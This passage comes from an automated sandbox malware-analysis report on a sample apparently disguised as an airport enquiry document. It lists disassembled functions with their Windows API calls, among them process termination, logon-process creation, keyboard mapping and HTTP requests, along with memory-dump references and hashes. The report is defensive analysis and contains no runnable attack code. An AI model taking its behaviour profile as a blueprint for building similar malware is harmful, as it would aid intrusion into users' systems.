            • OpenProcessToken.ADVAPI32(00000000), ref: 00CD8B31
            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00CD8B40
            • CloseHandle.KERNEL32(00000004), ref: 00CD8B4B
            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CD8B7A
            • DestroyEnvironmentBlock.USERENV(00000000), ref: 00CD8B8E
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
            • String ID:
            • API String ID: 1413079979-0
            • Opcode ID: ac82dc91329c3a372000929381e656e2f51a5298055836cb4f67e283d4aaa1fa
            • Instruction ID: c1fc1088ad9f3768022dc43e849b3d47d5090cb96002c2f0934ba3f3e46aa188
            • Opcode Fuzzy Hash: ac82dc91329c3a372000929381e656e2f51a5298055836cb4f67e283d4aaa1fa
            • Instruction Fuzzy Hash: B1115CB2500209BBDF118FA4DD49FDE7BA9EF48704F144066FE04E2260C7719E659B61
            Function 00D0C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C8134D
              • Part of subcall function 00C812F3: SelectObject.GDI32(?,00000000), ref: 00C8135C
              • Part of subcall function 00C812F3: BeginPath.GDI32(?), ref: 00C81373
              • Part of subcall function 00C812F3: SelectObject.GDI32(?,00000000), ref: 00C8139C
            • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00D0C1C4
            • LineTo.GDI32(00000000,00000003,?), ref: 00D0C1D8
            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00D0C1E6
            • LineTo.GDI32(00000000,00000000,?), ref: 00D0C1F6
            • EndPath.GDI32(00000000), ref: 00D0C206
            • StrokePath.GDI32(00000000), ref: 00D0C216
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
            • String ID:
            • API String ID: 43455801-0
            • Opcode ID: 803105576e8b05db5768a0fb925dfcdcc40d1fa7da2368ea96f0c67353ce5e35
            • Instruction ID: 5af88a124908990bfcc014e0797302cce4dcc8655b3dbb123048eeca904f7c75
            • Opcode Fuzzy Hash: 803105576e8b05db5768a0fb925dfcdcc40d1fa7da2368ea96f0c67353ce5e35
            • Instruction Fuzzy Hash: 50111B7640020CBFDF119F90DC88FAA7FADEB09354F148021BE198A6A1C7719D55DBB0
            Function 00CA03A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
            Download Yara Rule
            APIs
            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00CA03D3
            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00CA03DB
            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00CA03E6
            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00CA03F1
            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00CA03F9
            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CA0401
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Virtual
            • String ID:
            • API String ID: 4278518827-0
            • Opcode ID: 5bb68a8f6bdc3e938e10ec3efaa2cb3eb4035f9789285c42e84edc174679f445
            • Instruction ID: aac3c0dc5b3d1d5de73eaccc6ea5dcbb1de84391e8d89a8da181f5f51642f650
            • Opcode Fuzzy Hash: 5bb68a8f6bdc3e938e10ec3efaa2cb3eb4035f9789285c42e84edc174679f445
            • Instruction Fuzzy Hash: 00016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C87A41C7F5A864CBE5
            Function 00CE568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
            Download Yara Rule
            APIs
            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00CE569B
            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00CE56B1
            • GetWindowThreadProcessId.USER32(?,?), ref: 00CE56C0
            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CE56CF
            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CE56D9
            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CE56E0
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
            • String ID:
            • API String ID: 839392675-0
            • Opcode ID: ca463c3eb6241f02a84cd77ffe29c8060977c6445ee215a921dbf487a990cb0b
            • Instruction ID: 518a34f7478fd5ad5508cfc98ee7ac4c7ca8d3f34dbfcee6bbfc01084c1e1b3f
            • Opcode Fuzzy Hash: ca463c3eb6241f02a84cd77ffe29c8060977c6445ee215a921dbf487a990cb0b
            • Instruction Fuzzy Hash: EFF01D32241258BBE7315BA29C0DFAB7A7CEBC6B11F500169FA08D1650DAA11A0186B5
            Function 00CE74D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • InterlockedExchange.KERNEL32(?,?), ref: 00CE74E5
            • EnterCriticalSection.KERNEL32(?,?,00C91044,?,?), ref: 00CE74F6
            • TerminateThread.KERNEL32(00000000,000001F6,?,00C91044,?,?), ref: 00CE7503
            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00C91044,?,?), ref: 00CE7510
              • Part of subcall function 00CE6ED7: CloseHandle.KERNEL32(00000000,?,00CE751D,?,00C91044,?,?), ref: 00CE6EE1
            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CE7523
            • LeaveCriticalSection.KERNEL32(?,?,00C91044,?,?), ref: 00CE752A
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
            • String ID:
            • API String ID: 3495660284-0
            • Opcode ID: ec439a5a9c12a38e4e86dc2d72b8ac12e14252b204a33bf49108f0721277cda0
            • Instruction ID: b66a0fbe68d65ee7c54f1756a4bacfaaba56cf5f87aa45ca9a020142c1bed6f9
            • Opcode Fuzzy Hash: ec439a5a9c12a38e4e86dc2d72b8ac12e14252b204a33bf49108f0721277cda0
            • Instruction Fuzzy Hash: C0F05E3A141712EBDB212B74FC8CAEB7B2AEF45302B200635F246D19B4CB755901CBA4
            Function 00CD8E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
            Download Yara Rule
            APIs
            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CD8E7F
            • UnloadUserProfile.USERENV(?,?), ref: 00CD8E8B
            • CloseHandle.KERNEL32(?), ref: 00CD8E94
            • CloseHandle.KERNEL32(?), ref: 00CD8E9C
            • GetProcessHeap.KERNEL32(00000000,?), ref: 00CD8EA5
            • HeapFree.KERNEL32(00000000), ref: 00CD8EAC
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
            • String ID:
            • API String ID: 146765662-0
            • Opcode ID: 07bd949a5ec2ae05b5094aeeb48ea093c1948bd93f2c05ec39dddc875da3856a
            • Instruction ID: 85b25c31c9a1b3a985bc56efc4cd4b0370f35e765e6f10f8948eb7b09e3e28cf
            • Opcode Fuzzy Hash: 07bd949a5ec2ae05b5094aeeb48ea093c1948bd93f2c05ec39dddc875da3856a
            • Instruction Fuzzy Hash: 62E0C236004301FBDA115FE1EC0CA0ABB79FB99722B208230F219C1A70CB32A461DBA1
            Function 00CF8902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
            Download Yara Rule
            APIs
            • VariantInit.OLEAUT32(?), ref: 00CF8928
            • CharUpperBuffW.USER32(?,?), ref: 00CF8A37
            • VariantClear.OLEAUT32(?), ref: 00CF8BAF
              • Part of subcall function 00CE7804: VariantInit.OLEAUT32(00000000), ref: 00CE7844
              • Part of subcall function 00CE7804: VariantCopy.OLEAUT32(00000000,?), ref: 00CE784D
              • Part of subcall function 00CE7804: VariantClear.OLEAUT32(00000000), ref: 00CE7859
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Variant$ClearInit$BuffCharCopyUpper
            • String ID: AUTOIT.ERROR$Incorrect Parameter format
            • API String ID: 4237274167-1221869570
            • Opcode ID: 891ea0345b714202910647ee80d3116df108f6b8e29c54ba713d87339eb70e57
            • Instruction ID: eabec6bf555a4096e573d28027bbe6898ef45541d6f6220470c0d78a36c56c29
            • Opcode Fuzzy Hash: 891ea0345b714202910647ee80d3116df108f6b8e29c54ba713d87339eb70e57
            • Instruction Fuzzy Hash: FF91AF716083059FC750EF24C88196ABBE4EF88304F14496EF99A8B361DB30E90ADB52
            Function 00CE2F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C9FEC6: _wcscpy.LIBCMT ref: 00C9FEE9
            • _memset.LIBCMT ref: 00CE3077
            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CE30A6
            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CE3159
            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00CE3187
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ItemMenu$Info$Default_memset_wcscpy
            • String ID: 0
            • API String ID: 4152858687-4108050209
            • Opcode ID: 28689ebf6d09888c7907e0798b037e254eb144fb4ac7dff0c5fd714fec98d55f
            • Instruction ID: 6dd9a6664c56044b6009f9edee8c8e51711176ad4357dba25e4e725c2a9bf31a
            • Opcode Fuzzy Hash: 28689ebf6d09888c7907e0798b037e254eb144fb4ac7dff0c5fd714fec98d55f
            • Instruction Fuzzy Hash: AC51C0316083C19BD7259F2AC849A6FB7E8EF45364F04092DF8A5D32A1DB70EF449752
            Function 00CDDA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
            Download Yara Rule
            APIs
            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00CDDAC5
            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00CDDAFB
            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00CDDB0C
            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00CDDB8E
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ErrorMode$AddressCreateInstanceProc
            • String ID: DllGetClassObject
            • API String ID: 753597075-1075368562
            • Opcode ID: 7e26349916d32be09a0e175f2ba82075c8af04f2bdf4caf8cb1eba2573ad68bc
            • Instruction ID: dd8f3580c657e5f49e78ee1b95458cb89152efd898ebecf14a15558ebcb6a4d3
            • Opcode Fuzzy Hash: 7e26349916d32be09a0e175f2ba82075c8af04f2bdf4caf8cb1eba2573ad68bc
            • Instruction Fuzzy Hash: 1A4150B1A00304EFDB15CF55C884A9ABBA9EF44354F1581ABAE0A9F305D7B1DA44DBA0
            Function 00CE2C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
            Download Yara Rule
            APIs
            • _memset.LIBCMT ref: 00CE2CAF
            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00CE2CCB
            • DeleteMenu.USER32(?,00000007,00000000), ref: 00CE2D11
            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00D46890,00000000), ref: 00CE2D5A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Menu$Delete$InfoItem_memset
            • String ID: 0
            • API String ID: 1173514356-4108050209
            • Opcode ID: 95b8c00ec9f70d14c8de6125b371b06b78b71048d9e077c606e5d0f86e4f67f0
            • Instruction ID: 3255aa49830f20ed96440d218e98e90637c0a3e397fd41dd968702cbc6303b07
            • Opcode Fuzzy Hash: 95b8c00ec9f70d14c8de6125b371b06b78b71048d9e077c606e5d0f86e4f67f0
            • Instruction Fuzzy Hash: A7418E702043829FD724DF25DC45B1ABBE9EF85320F14461DFA65D7291D770EA04CBA2
            Function 00CFDAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
            Download Yara Rule
            APIs
            • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00CFDAD9
              • Part of subcall function 00C879AB: _memmove.LIBCMT ref: 00C879F9
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: BuffCharLower_memmove
            • String ID: cdecl$none$stdcall$winapi
            • API String ID: 3425801089-567219261
            • Opcode ID: 7b13614c7bb67a0f9d5b2ec9b80b88e7d9a16cd94cc21007817d1a4e0017c19c
            • Instruction ID: 021aaefb0214a5cdaa46cb201e50b90c55f97d85a7ae623e1205618c578713b9
            • Opcode Fuzzy Hash: 7b13614c7bb67a0f9d5b2ec9b80b88e7d9a16cd94cc21007817d1a4e0017c19c
            • Instruction Fuzzy Hash: 3931AE7190021AABCF00EF54C8809BEB3B5FF05314B10862AE936977D1DB71EA06DB90
            Function 00CD9372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
              • Part of subcall function 00CDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00CDB0E7
            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00CD93F6
            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00CD9409
            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00CD9439
              • Part of subcall function 00C87D2C: _memmove.LIBCMT ref: 00C87D66
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$_memmove$ClassName
            • String ID: ComboBox$ListBox
            • API String ID: 365058703-1403004172
            • Opcode ID: a8e82a16ef6c018f87ffef3358fe631e80ff2d1792baac174923096230b7c2ae
            • Instruction ID: 36c75aab37acacc9632b8183dd3d119f8c20897ef73799946d59f3820d36149b
            • Opcode Fuzzy Hash: a8e82a16ef6c018f87ffef3358fe631e80ff2d1792baac174923096230b7c2ae
            • Instruction Fuzzy Hash: A0210175900204AEDB14ABB0CC859FFB768DF05364B20422AFA25972E1DB355E0AA720
            Function 00CF1B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
            Download Yara Rule
            APIs
            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CF1B40
            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CF1B66
            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00CF1B96
            • InternetCloseHandle.WININET(00000000), ref: 00CF1BDD
              • Part of subcall function 00CF2777: GetLastError.KERNEL32(?,?,00CF1B0B,00000000,00000000,00000001), ref: 00CF278C
              • Part of subcall function 00CF2777: SetEvent.KERNEL32(?,?,00CF1B0B,00000000,00000000,00000001), ref: 00CF27A1
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
            • String ID:
            • API String ID: 3113390036-3916222277
            • Opcode ID: ddc0a41e1f8100c59f5dea57724eac0f61084ca4228d542b45ac24b90f4a501b
            • Instruction ID: f2262196b7e870b8039a7a7875fc5208ef8cfa03ff55b104eb7123194442f955
            • Opcode Fuzzy Hash: ddc0a41e1f8100c59f5dea57724eac0f61084ca4228d542b45ac24b90f4a501b
            • Instruction Fuzzy Hash: 5621BEB150020CFFEB619F21CC85EBB77ECEB89744F14012AFA05E2240EA209E0597B2
            Function 00D06656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C81D73
              • Part of subcall function 00C81D35: GetStockObject.GDI32(00000011), ref: 00C81D87
              • Part of subcall function 00C81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C81D91
            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00D066D0
            • LoadLibraryW.KERNEL32(?), ref: 00D066D7
            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00D066EC
            • DestroyWindow.USER32(?), ref: 00D066F4
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
            • String ID: SysAnimate32
            • API String ID: 4146253029-1011021900
            • Opcode ID: 61ababaebb795f20b217f521c2a77e7048addf8447d29b7c67cc952c2761550c
            • Instruction ID: 58996798a23ec2042b4168c98cc878ab46d69f1cdcccd62d00e6246469add7ed
            • Opcode Fuzzy Hash: 61ababaebb795f20b217f521c2a77e7048addf8447d29b7c67cc952c2761550c
            • Instruction Fuzzy Hash: 33218B71200206AFEF104F64EC80FAB37ADEB59368FA44629FA59D21E0D772CC619770
            Function 00CE703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
            Download Yara Rule
            APIs
            • GetStdHandle.KERNEL32(0000000C), ref: 00CE705E
            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CE7091
            • GetStdHandle.KERNEL32(0000000C), ref: 00CE70A3
            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00CE70DD
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CreateHandle$FilePipe
            • String ID: nul
            • API String ID: 4209266947-2873401336
            • Opcode ID: 4632f397794e1fbc1051efa5e38caa39ce14e141e2aeb25ce1cf9d0e9c3baca2
            • Instruction ID: 1f2b2e778f0c5a97941992ffe02155f1338a2232913acee67c39abf2f37ce799
